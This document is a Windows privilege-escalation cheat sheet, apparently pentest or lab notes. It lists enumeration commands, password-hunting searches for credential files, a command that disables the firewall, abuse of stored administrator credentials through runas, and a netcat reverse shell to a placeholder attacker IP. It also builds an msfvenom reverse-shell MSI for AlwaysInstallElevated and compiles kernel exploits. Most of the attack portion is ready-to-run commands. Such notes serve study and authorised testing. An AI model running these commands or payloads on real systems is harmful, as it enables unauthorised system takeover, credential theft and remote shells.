Windows Privilege Escalation

Enumeration

  • OS Info Enumeration
    • systeminfo
    • hostname
    • echo %username%
    • wmic qfe -> check patches
    • wmic logicaldisk -> get other disk information
  • User Enumeration
    • whoami
    • whoami /priv -> check user privilleges
    • whoami /groups -> check user groups
    • net user -> list all users
    • net user <username> -> check groups associated with a user
    • net localgroup -> Check all the local groups available
    • net localgroup <group name> -> List the members of the given localgroup
  • Task | Service | Process Enumeration
    • sc queryex type= service (Lists all the service)
    • tasklist /SVC
    • tasklist
    • net start
    • DRIVERQUERY
    • wmic product get name, version, vendor
  • Permission Enumeration
    • C:\Program Files : icacls program_name
    • icacls root.txt /grant <username>:F (to grant permission to access file)
    • Check the PowerShell history file type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    • Check stored usernames and passwords
      • cmdkey /list
  • Network based
    • ipconfig
    • ipconfig /all
    • arp -a
    • router print
    • netstat -ano
  • Password Hunting
    • findstr /si password *.txt *.ini *.config (try searching in different directories)
      dir /s *pass* == *cred* == *vnc* == *.config*
      dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
      where /R C:\ user.txt
      where /R C:\ *.ini
  • AV / Firewall check / Service Enumeration
sc query windefend
netsh advfirewall firewall dump
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
netsh firewall show state (show firewall running or stopped)
netsh firewall show config (show firewall configuration)
netsh firewall set opmode disable # Disable firewall
  • Scheduled Tasks
schtasks /query /fo LIST /v
  • Mount Information
    • mountvol

Escalation Techniques

Service Account Priv Esc (Token Impersonation)
  • whoami /priv
Run As :
Use the cmdkey to list the stored credentials on the machine.
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Using runas with a provided set of credential.
runas /savecred /user:admin C:\PrivEsc\reverse.exe
C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
Could not load image
Access check :
  • accesschk.exe -ucqv [service_name] /accepteula
  • accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
  • Find all weak folder permissions per drive.
    • accesschk.exe /accepteula -uwdqs Users c:\
    • accesschk.exe /accepteula -uwdqs "Authenticated Users" c:\
  • Find all weak file permissions per drive.
    • accesschk.exe /accepteula -uwsv "Everyone" "C:\Program Files"
    • accesschk.exe /accepteula -uwqs Users c:\*.*
    • accesschk.exe /accepteula -uwqs "Authenticated Users" c:\*.*
  • Powershell:
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
Unquoted Service Path Privilege Escalation

PATH directories with weak permissions

C:\Temp> for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
C:\Temp> for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
C:\Temp> sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
C:\Temp> type Servicenames.txt
C:\Temp> FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
C:\Temp> FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
Always Install Elevated :
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 –f msi > install.msi
C:> msiexec /quiet /qn /i install.msi
Kernel Exploits :
i686-w64-mingw32-gcc exploit.c -o exploit
or for 32 bit
i686-w64-mingw32-gcc 40564.c -o 40564 -lws2_32

Automated Enumeration Tools

Could not load image
Powershell:
Metasploit :
  • getsystem
  • run post/multi/recon/local_exploit_suggester
Resources :